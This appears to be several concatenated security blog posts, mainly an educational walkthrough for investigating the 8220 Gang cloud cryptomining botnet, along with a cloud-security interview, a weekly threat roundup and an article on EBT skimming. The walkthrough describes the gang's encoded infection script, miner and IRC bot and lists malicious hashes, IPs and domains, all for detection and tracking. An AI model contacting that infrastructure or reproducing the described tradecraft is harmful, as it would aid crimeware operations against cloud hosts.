These flows allow users visibility into threats and risks, protect credentials, limit attack paths, and all while only rarely requiring analyst action.

Integrating Mobile Security with Open XDR

With the launch of this Microsoft integration, SentinelOne also expands its native and open approach to XDR. While SentinelOne mobile threats and risks already enrich workstation threats, mobile risk and threats will now be informed by Intune’s device visibility. By bringing Intune data into the platform, security teams gain a better view of each device and the environment.

As Singularity Mobile is an integrated part of the SentinelOne console, mobile devices will only further benefit from SentinelOne’s platform approach to XDR as investment into XDR capabilities continues.

Singularity Mobile and Microsoft Intune suspicious android app

Correlation and automation are driving the platform to new and differentiated levels, allowing mobile threats triaged from the platform to stand to benefit from capabilities like unrivaled investigation flows in Skylight and no-code automations available in the Singularity Marketplace.


With the market investing in mobile security like never before, SentinelOne is excited to offer customers a differentiated, integrated, easy-to-manage solution to combat mobile phishing, malicious apps and networks, and vulnerability detection by combining those capabilities with the world’s largest MDM.

To learn more about how SentinelOne can help secure all endpoints, cloud and identity across the enterprise, contact us or request a demo.

Singularity Mobile
Combat the Rising Tide of Mobile Threats
with On-Device, Adaptive, Real-Time
Mobile Defense

SOC Team Essentials | How to Investigate and Track the 8220 Gang Cloud Threat

8220 Gang is a low-skill crimeware actor known for infecting cloud hosts through n-day vulnerabilities and remote access brute forcing. We have previously detailed how 8220 expanded its botnet and rotated its infrastructure. Since our last write up in October, the group has again switched to new infrastructure and samples, providing us with an opportunity to share an educational walkthrough of the process of investigating cybercrime activity that may be useful to new or lesser experienced SOC teams, analysts and researchers.

In this post, we use 8220 Gang activity as a lens through which to explain the process of investigating a threat, researching the threat activity as a whole, and gaining a perspective into attacker objectives, ultimately concluding with a wider understanding of related threat intelligence.

Refresher on 8220 Gang

8220 Gang (pronounced eighty-two twenty), also known as 8220 Mining Group, was first publicly reported by Talos in 2018. Victims of 8220 Gang are typically, but not exclusively, users of cloud networks operating vulnerable and misconfigured Linux applications and services.

Attacks make use of SSH brute forcing post-infection to automate local and global spreading attempts. Victims using cloud infrastructure (AWS, Azure, GCP, Aliyun, QCloud) are often infected via publicly accessible hosts running Docker, Confluence, Apache WebLogic, and Redis. Victims are not targeted geographically but simply identified by their internet accessibility.

Initial Discovery

Our walkthrough starts with the initial discovery of an interesting script found on a compromised AWS machine with publicly available SSH service secured with weak credentials. For readers not running a honeypot, this initial discovery could have also been observed in the monitoring of new files uploaded to file scanning services like VirusTotal or MalShare. For those looking to monitor this group, international SSH honeypots plus VirusTotal YARA rules offer a reliable method of catching new activity as it occurs.

The script in question has the SHA1 a9da0947243333d95f84f6a0e37b9fc29b2fb054.

8220 Infection Script Snippet
8220 Infection Script Snippet

We can see it is quite simple in design and built around the process of downloading and setting persistence of some other file.

With a few string pivots inside VT, or even a few Google searches, we can quickly discover the core functionality of the script has been widely reported on as it has been reused by many amateur cryptocurrency mining groups and opportunistic profit-seeking attackers.

Pivoting on part of the script’s content in VTi
Pivoting on part of the script’s content in VirusTotal Intelligence

One example of such reporting is our July 2022 post on 8220 Gang expanding their botnet to roughly 30,000 hosts. However, this time the attacker-specific infrastructure is different, and we have not determined if it has delivered similar malware. Remember, this “infection script” is used by many attackers, and it alone is a very weak source of attribution.

8220 Infection Script Analysis

The script goes through a set of instructions, often at multiple levels of encoded commands, aimed at the delivery of setting persistence on the victim machine by downloading itself from malicious servers. The multiple levels of Base64 encoding attempt to hide the fact that it is also downloading a specific payload as well. This is first observed under the createservices function.

Infection Script createservices Function
Infection Script createservices Function

One difference that’s quickly apparent to past reporting on the script is that the attacker began adding the lwp-download command as a failover for wget and curl to enable downloading commands. We initially observed this activity on January 6th, and since then the actor has continued to standardize it in their infection scripts today. Sysdig also noted this activity in a recent blog.

Infection Script use of lwp-download
Infection Script use of lwp-download

The key take away from analyzing these infection scripts is noting unique additions, like lwp–download, combined with the destination of download requests. By clustering infection scripts based on function names and order, if the functions are called, and what infrastructure is associated, we can weed out the non-8220 Gang samples.

Additionally, we can link this further based on the encoding quantity and repetition to past 8220 Gang samples. For example, in our infection scripts createservices makes use of three base64 encoded echo commands. The first command can be decoded into a new script which pings associated attacker infrastructure and then starts a “payload” command.

Infection Script’s encoded payload
Infection Script’s encoded payload

The payload contains two additional base64 encoded scripts to set permissions, download, and configure miner and IRC bot infections. This functionality communicates with 194.38.23[.]170.

Post-Infection Activity & Sample Pivots

The post infection activity for this and other recent 8220 infection scripts evolve slightly, but generally proceed with infecting the victim with an updated PwnRig cryptocurrency miner and IRC bot.

In the infection scripts we observed in this campaign, the group continued to use old bash IRC bot “Tsunami”. The sample delivered remains unchanged; however, the network it communicates with evolves over campaigns. The infection script here delivered 472548a4b8295182f6ba8641d74725c2250b7243 – the Tsunami sample.

More useful for tracking 8220 Gang are the samples of PwnRig – the custom version of the open source XMRig cryptocurrency miner – that they drop. In this campaign, the script downloads the UPX packed sample 38be55f1fc4ce1cb5438236abc5077019e5e1cdf, which unpacks to 332485bd460f55117a254f8164736b90d74aa9f6. A characteristic of 8220 Gang is their repeated use of fake miner pool domains themed around the FBI. Here, we see this theme again through the use of the malicious domain fbi.su1001-2[.]top.

Infrastructure Analysis

Tracking 8220 Gang is aided somewhat by their failures in infrastructure OPSEC. Since the beginning of what the industry calls “8220 Gang” the primary method of attribution has been reused infrastructure and identification of newly associated infrastructure. While this technique alone does not link the actor with certainty, it remains reliable when combined with the previously noted linkability around malware samples delivered.

During our initial investigation in January, the group was using 185.106.94[.]146, and dw.bpdeliver[.]ru for malware download location post-infection such as in their infection script. Anyone looking into this group should pivot on all subdomains associated with the actor-controlled domain, in addition to all DNS history of malicious IPs to identify a wider set of the malicious activity.

For example, the recent dw.bpdeliver[.]ru host resolved to 79.137.203[.]156 during the initial deployment of the script. More activity of 8220 Gang scripts can be found calling directly to this IP rather than the domain. The same goes for 185.106.94[.]146, which is called by IP in the script, and which at the time resolved to jira.letmaker.top, a widely reported known 8220 Gang domain.

Overall, the group is clumsy and unsophisticated in their infrastructure management, providing a good opportunity for those willing to track the mess or cut their teeth in threat actor investigation.

Our graphic from a previous campaign explains the overlap, which can still be found in this most recent activity.

Visual Context of 8220 Gang Infrastructure Roles
Visual Context of 8220 Gang Infrastructure Roles


Tracking and researching 8220 Gang, which has exhibited a lack of operational security, requires a simple understanding of their use of malicious scripts, malware samples, and malicious infrastructure. A successful approach to tracking this group can involve monitoring and analyzing malware samples, identifying patterns in their malicious scripts, and mapping out their infrastructure.

Indicators of Compromise

Indicator Description
a9da0947243333d95f84f6a0e37b9fc29b2fb054 8220 Gang Install Script
472548a4b8295182f6ba8641d74725c2250b7243 8220 Gang Bashirc.x86_64 – PackedOld version, “Tsunami”
38be55f1fc4ce1cb5438236abc5077019e5e1cdf 8220 Gang X86_64 – Packed MinerUses fbi.su1001-2[.]top
332485bd460f55117a254f8164736b90d74aa9f6 e2c3e. Unpacked, PwnRig Miner 8220 Gang Infrastructure – Shared
jira.letmaker.top 8220 Gang Infrastructure – Reused 8220 Gang Infrastructure
dw.bpdeliver.ru 8220 Gang Infrastructure – Recent
fbi.su1001-2.top 8220 Gang Infrastructure – Recent 8220 Gang Infrastructure

Staying Secure In the Cloud | An Angelneers Interview with Ely Kahn

Cloud computing has allowed modern organizations to scale at incredible rates, transforming how organizations collaborate and operate. While cloud adoption grows across all industries, its inherent risks have expanded alongside it. This steers security leaders towards implementing the right cybersecurity strategies to protect their cloud environments.

In the latest Angelneers podcast episode, host Oleg Sullivan Koujikov spoke with SentinelOne’s VP, Product Management for Cloud Security, Ely Kahn, about the realities of using cloud computing, the three main cloud-based attack vectors, and the rise of cloud native application protection platforms (CNAPPs) in combating threat actors who continue to take aim at this fast-growing attack surface. In this post, we share Ely’s main take aways for staying secure in the cloud.

Growing Threats Organizations Face in the Cloud

Koujikov: Today, in 2023, many business organizations have completely migrated computing resources to the cloud and other companies are still working to migrate over to the cloud. It seems we are trending in this direction and threats are also growing in cloud computing. Can you talk about some of the cloud security issues and threats organizations face as this larger trend towards cloud computing is adopted?

Kahn: The first thing to remember with cloud security is what people use the cloud for. Organizations are using the cloud to host web applications and store their data. Oftentimes, this is time-sensitive data or business-critical web applications that are generating tens, if not hundreds of millions of dollars of revenue.

This in mind, the real goal of cloud security is to defend those applications and the underlying infrastructure that they sit on in the cloud. Given that there are these applications in cloud processing, sensitive data like personal health information, personally identifiable information (PII), or credit card information, attract adversaries who want to either steal that information, resell it on the dark web, or use it to conduct a ransomware attack. Adversaries then extract money from a victim company who are trying to unbrick their application that has been encrypted due to that ransomware incident.

3 Common Cloud-Based Attack Vectors

Kahn: Adversaries or threat actors are conducting these attacks using one of three ways as their initial access. The following are stack ranked in relative frequency.

1. Misconfigured Resources

Number one on the list is misconfigured resources and, specifically, cloud resources that are made publicly accessible to the internet. For example, if I am using an S3 bucket, Elasticsearch cluster, or another type of cloud database and I accidentally misconfigure it so that it is publicly accessible from the internet when it shouldn’t be, I will be breached within minutes.

There are adversaries continuously scanning the internet and AWS IP ranges for any type of resource that is exposed to the internet. Suppose that resource contains sensitive data or connections to other resources through overly permissive identity roles or permissions. This is a classic way in which organizations experience cloud breaches.

2. Compromised Access Keys

With cloud providers, there’s the concept of access keys. On one hand, think username and password-type access keys and, on the other, there are ephemeral access keys. Ephemeral access keys are always the recommended way for setting up your access through identity access management (IAM) roles instead of IAM users. Roles have ephemeral access keys; users have long-lasting access keys.

The long-lasting access keys can get compromised in a number of ways. They can get stolen, people can hard code them and then find that the code repos are made public. Essentially, finding access keys and then using them to access cloud accounts is the second most common cloud-based risk organizations face.

3. Vulnerable Web Applications

As mentioned before, people are using cloud computing to host web applications from cloud providers. Those web applications could have exploitable vulnerabilities associated with them. For example, a company may be using a version of WordPress that has a badge or corrupted plug-in that can be exploited, or a form on their application is subject to SQL injection.

There are several ways to protect applications from these types of vulnerabilities. You can scan the application vulnerabilities, or put a web application firewall in front of them to limit the malicious actions that can be taken against them. However, once a threat actor has gotten in through that front door, they are able to move laterally and conduct various types of cloud attacks.

Koujikov: To summarize these three main cloud-based attack vectors, we can say it’s like one: you left open a door, two: someone got a key, or three: they went right through the front door.

Kahn: Exactly, and maybe broke a window in the process!

Understanding Hybrid & Multi-Cloud Risks

Koujikov: Next, can you talk about the growing hybrid cloud approach? It implies that services and applications that can be hosted are configured locally and could be migrated to a cloud. Can you talk about the proliferation of hybrid and multi-cloud security?

Kahn: Let me break these down a little bit: What does multi-cloud mean? Multi-cloud means that you’re actually using multiple cloud providers, for example AWS and Azure, for your host workloads. Rarely is the same application being used across multiple cloud providers. More often, organizations are picking one cloud provider for one type of workload and another cloud provider for another type of workload, because you really like their capabilities in a particular area. Back to the example, perhaps an organization is using Azure for its machine learning, but then using AWS for everything else.

With hybrid cloud, this refers to organizations that store some of their data in a public cloud environment while simultaneously running other applications within their own on-prem environment, which could be a private cloud environment. What’s interesting from a security perspective is the idea that security incidents can actually start on-prem and then move into the cloud or vice versa. So, right now, I would say that most security solutions are relatively stovepiped meaning they only focus on cloud security, or they only focus on on-prem security.

Because of that stovepipe-like focus, many security solutions potentially miss these pivots between on-prem and cloud environments. This limits your ability to really, truly understand the full scope of an attack or a full scope of incident.

As an example, a user could accidentally enter credentials in a malicious website linked from a phishing email. An adversary would then use those credentials to log into their machine. From there, actors could use privilege escalation techniques to acquire admin credentials or find existing admin credentials on the compromised machine. Say those admin credentials are cloud admin credentials.

With that access in hand, the threat actor could log into the cloud and perhaps create a new user for themself that has permissions to complete the rest of their mission in the cloud. From the point of view of a threat actor, I’ve just pivoted from your laptop into the cloud environment and I’m executing nefarious actions there.

For security leaders today, what’s important is to put all of these pieces together into a larger storyline – a unified view that cuts across both on-prem and cloud environments.

How Cloud Native Application Protection Platforms (CNAPPs) Can Help

Koujikov: Is that why there’s an interest in cloud native application protection platforms (CNAPPs)?

Kahn: “Cloud native application protection platform” is a term coined originally by Gartner, but used widely throughout the industry now. Going back to the idea of stovepipe-like connections between on-prem security and cloud security, there’s lots of specialization. Alternatively, the idea of CNAPPs begins to merge various cloud security tools into a more unified platform itself.

To completely and fully defend the cloud, organizational leaders need application security tools that can ensure the integrity and the security of the code associated with the applications that they’re deploying to the cloud. They need security tooling to look at the development and deployment pipelines for that code.

When code is developed, it goes through a series of tests moving from beta to production environments. That pipeline itself needs to be secure. Using the case of the SolarWinds attack, Russian-linked threat actors were found to have injected code into the SolarWinds code base via their development and deployment pipelines. Since then, that’s really keyed in the idea that the pipeline itself needs to be secure for the rest of the community.

Once you deploy that code into your cloud environment, you need to make sure that the outer perimeter of that cloud environment is secure by putting in place network firewalls and web application firewalls. Security leaders need to also be looking at the infrastructure that that code is running on and monitoring that infrastructure including virtual machines, containers, databases, and the identities being used. Monitoring for misconfigurations, anomalies, and signs of adversary behavior needs to happen for all of those aspects of cloud computing.

The vision for CNAPP is uniting all these things together so that you can have a clear line of sight. CNAPP gives us the ability to see malware that’s sitting on a machine in your cloud environment as well as visibility all the way back to the initial code repo that contains the instructions about how that machine should be deployed. This visibility translates to the ability to go back to the beginning and make sure that any misconfigurations in that initial deployment code are cleaned up.

Learn About SentinelOne’s Singularity for Cloud

To maintain steps ahead of threat actors, organizations using cloud services must fully understand how the services are being implemented and maintained. Visibility within the cloud is critical to seeing how file sharing is being done, the type of data being stored and its security, and what applications are connected.

SentinelOne’s Singularity™ Cloud ensures organizations get the right security in place to continue operating in their cloud infrastructures safely. Contact us today or book a demo to see how we can help improve your cloud defenses and fuse autonomous threat hunting, endpoint detection and response (EDR) capability, and security together to defeat cloud-based threats without compromising agility or availability.

Singularity Cloud
Simplifying security of cloud VMs and containers, no matter their location, for maximum agility, security, and compliance.

About Angelneers

Angelneers is a community of startup builders with a mission of helping a new generation of startups drive the next phase of enterprise transformation. Angelneers aims to propagate better decisions around product, engineering, and growth. Their podcast interviews founders, operators, and technologists who have founded or helped build game-changing companies in the enterprise space.

The Good, the Bad and the Ugly in Cybersecurity – Week 7

The Good

Vladislav Klyushin, the owner of Russian cybersecurity firm M-13, was this week convicted in a U.S. court on charges of wire fraud, securities fraud, and obtaining unauthorized access to computers. Klyushin, along with four co-conspirators who remain at large, is believed to have netted around $90 million through securities trades based on information stolen from U.S. computer networks.

According to the DoJ, Klyushin used hacking techniques similar to those offered by his cybersecurity company to repeatedly hack into U.S. computer networks and steal confidential earnings reports ahead of their release. He then used the information obtained to trade illegally in the shares of hundreds of publicly traded companies.

In a trial that lasted 10 days, the court in Boston heard how Klyushin and his co-conspirators stole login information of employees at two U.S.-based filing agents used by publicly-traded companies to file their quarterly and annual earning reports to the SEC. They used proxy networks outside of Russia to conceal the true origin of their activities and stole filings from hundreds of companies, including Tesla, Roku and Snap. Much of the stolen data was downloaded through a computer server located in downtown Boston. Klyushin used the stolen information to trade in brokerage accounts held in his own name and the names of others.

The charges of securities fraud and wire fraud alone each provide for a sentence of up to 20 years in prison. Klyushin, who was arrested in Switzerland in 2021 and subsequently extradited to the U.S., is due to be sentenced on May 4th.

The Bad

Threat actors have been leveraging the cloud services of Dropbox, Microsoft Azure, Microsoft 365 Mail, and Google Firebase in what appears to be espionage-related activity against telecommunications companies in the Middle East.

A new report from SentinelLabs reveals that a cluster of threat activity targeting telcos used malicious WhatsApp messages to infect employees with malware hosted on Dropbox. Backdoors leveraging Microsoft 365 Mail and Google Firebase instances as C2 servers were then deployed on victims’ machines.

The backdoors masquerade as utility software, such as a PDF editor or browser, and use filenames, application icons, and digital signatures of known software vendors. Their capabilities include reconnaissance, privilege escalation, staging of additional malware, and data exfiltration. PowerShell commands were used to exfiltrate browser data and reconnaissance information to Microsoft Azure instances.

WIP26: Use of Cloud infrastructure

The use of public Cloud infrastructure for malware hosting, data exfiltration, and C2 purposes aims at making malicious traffic look legitimate. This gives attackers the opportunity to conduct their activities unnoticed, the SentinelLabs’ researchers say.

The cluster of activity at present remains unattributed to any known group and is tracked by SentinelLabs under the moniker “WIP26”. However, the threat actor behind the activity appeared to have made some OPSEC (operational security) errors. The researchers noted that a JSON file on a Google Firebase C2 server was publicly accessible and provided further insights into the WIP26 activity.

The Ugly

CISA is this week warning of four critical bugs in Microsoft and Apple software that may be under active exploitation and giving federal agencies 21 days to ensure their devices are patched.

A patch for a WebKit zero-day tracked as CVE-2023-23529 was released by Apple on Monday. The Cupertino outfit says that the bug allows maliciously crafted web content to cause arbitrary code execution and that it is aware of a report that the vulnerability may have been exploited in the wild. The WebKit bug affects macOS, iOS and iPadOS systems.

Tuesday saw Microsoft patch three bugs thought to be actively exploited, two of which could allow attackers to gain remote code execution. CVE-2023-21823 affects the Windows Graphics Component and, if successfully exploited, could allow an attacker to gain SYSTEM privileges. CVE-2023-23376 affects the Windows Common Log File System Driver and is an elevation of privileges vulnerability that requires no user interaction. Microsoft says the attack is of low complexity to carry out.

A third Microsoft bug patched this week, CVE-2023-21715, is a Microsoft Office macro policy bypass. Macro policies are intended to block untrusted or malicious files, but an attacker could use the bug to socially engineer a victim into downloading and opening a specially crafted file that could lead to a local attack on the victim’s computer.

CISA says bugs such as these are frequent attack vectors for malicious cyber actors and has given federal agencies until March 7 to patch affected systems. Enterprises would be well-advised to act somewhat faster than that.

New Protections for Food Benefits Stolen by Skimmers

Millions of Americans receiving food assistance benefits just earned a new right that they can’t yet enforce: The right to be reimbursed if funds on their Electronic Benefit Transfer (EBT) cards are stolen by card skimming devices secretly installed at cash machines and grocery store checkout lanes.

On December 29, 2022, President Biden signed into law the Consolidated Appropriations Act of 2023, which — for the first time ever — includes provisions for the replacement of stolen EBT benefits. This is a big deal because in 2022, organized crime groups began massively targeting EBT accounts — often emptying affected accounts at ATMs immediately after the states disperse funds each month.

EBT cards can be used along with a personal identification number (PIN) to pay for goods at participating stores, and to withdraw cash from an ATM. However, EBT cards differ from debit cards issued to most Americans in two important ways. First, most states do not equip EBT cards with smart chip technology, which can make the cards more difficult and expensive for skimming thieves to clone.

More critically, EBT participants traditionally have had little hope of recovering food assistance funds when their cards were copied by card-skimming devices and used for fraud. That’s because while the EBT programs are operated by individually by the states, those programs are funded by the U.S. Department of Agriculture (USDA), which until late last year was barred from reimbursing states for stolen EBT funds.

The protections passed in the 2023 Appropriations Act allow states to use federal funds to replace stolen EBT benefits, and they permit states to seek reimbursement for any skimmed EBT funds they may have replaced from their own coffers (dating back to Oct. 1, 2022).

But first, all 50 states must each submit a plan for how they are going to protect and replace food benefits stolen via card skimming. Guidance for the states in drafting those plans was issued by the USDA on Jan. 31 (PDF), and states that don’t get them done before Feb. 27, 2023 risk losing the ability to be reimbursed for EBT fraud losses.

Deborah Harris is a staff attorney at The Massachusetts Law Reform Institute (MLRI), a nonprofit legal assistance organization that has closely tracked the EBT skimming epidemic. In November 2022, the MLRI filed a class-action lawsuit against Massachusetts on behalf of thousands of low-income families who were collectively robbed of more than $1 million in food assistance benefits by card skimming devices secretly installed at cash machines and grocery store checkout lanes across the state.

Harris said she’s pleased that the USDA guidelines were issued so promptly, and that the guidance for states was not overly prescriptive. For example, some security experts have suggested that adding contactless capability to EBT cards could help participants avoid skimming devices altogether. But Harris said contactless cards do not require a PIN, which is the only thing that stops EBT cards from being drained at the ATM when a participant’s card is lost or stolen.

Then again, nothing in the guidance even mentions chip-based cards, or any other advice for improving the physical security of EBT cards. Rather, it suggests states should seek to develop the capability to perform basic fraud detection and alerting on suspicious transactions, such as when an EBT card that is normally used only in one geographic area suddenly is used to withdraw cash at an ATM halfway across the country.

“Besides having the states move fast to approve their plans, we’d also like to see a focused effort to move states from magstripe-only cards to chip, and also assisting states to develop the algorithms that will enable them to identify likely incidents of stolen benefits,” Harris said.

Harris said Massachusetts has begun using algorithms to look for these suspicious transaction patterns throughout its EBT network, and now has the ability to alert households and verify transactions. But she said most states do not have this capability.

“We have heard that other states aren’t currently able to do that,” Harris said. “But encouraging states to more affirmatively identify instances of likely theft and assisting with the claims and verification process is critical. Most households can’t do that on their own, and in Massachusetts it’s very hard for a person to get a copy of their transaction history. Some states can do that through third-party apps, but something so basic should not be on the burden of EBT households.”

Some states aren’t waiting for direction from the federal government to beef up EBT card security. Like Maryland, which identified more than 1,400 households hit by EBT skimming attacks last year — a tenfold increase over 2021.

Advocates for EBT beneficiaries in Maryland are backing Senate Bill 401 (PDF), which would require the use of chip technology and ongoing monitoring for suspicious activity (a hearing on SB401 is scheduled in the Maryland Senate Finance Commission for Thursday, Feb. 23, at 1 p.m.).

Michelle Salomon Madaio is a director at the Homeless Persons Representation Project, a legal assistance organization based in Silver Spring, Md. Madaio said the bill would require the state Department of Human Services to replace skimmed benefits, not only after the bill goes into effect but also retroactively from January 2020 to the present.

Madaio said the bill also would require the state to monitor for patterns of suspicious activity on EBT cards, and to develop a mechanism to contact potentially affected households.

“For most of the skimming victims we’ve worked with, the fraudulent transactions would be pretty easy to spot because they mostly happened in the middle of the night or out of state, or both,” Madaio said. “To make matters worse, a lot of families whose benefits were scammed then incurred late fees on many other things as a result.”

It is not difficult to see why organized crime groups have pounced on EBT cards as easy money. In most traditional payment card transactions, there are usually several parties that have a financial interest in minimizing fraud and fraud losses, including the bank that issued the card, the card network (Visa, MasterCard, Discover, etc.), and the merchant.

But that infrastructure simply does not exist within state EBT programs, and it certainly isn’t a thing at the inter-state level. What that means is that the vast majority of EBT cards have zero fraud controls, which is exactly what continues to make them so appealing to thieves.

For now, the only fraud controls available to most EBT cardholders include being especially paranoid about where they use their cards, and frequently changing their PINs.

According to USDA guidance issued prior to the passage of the appropriations act, EBT cardholders should consider changing their card PIN at least once a month.

“By changing PINs frequently, at least monthly, and doing so before benefit issuance dates, households can minimize their risk of stolen benefits from a previously skimmed EBT card,” the USDA advised.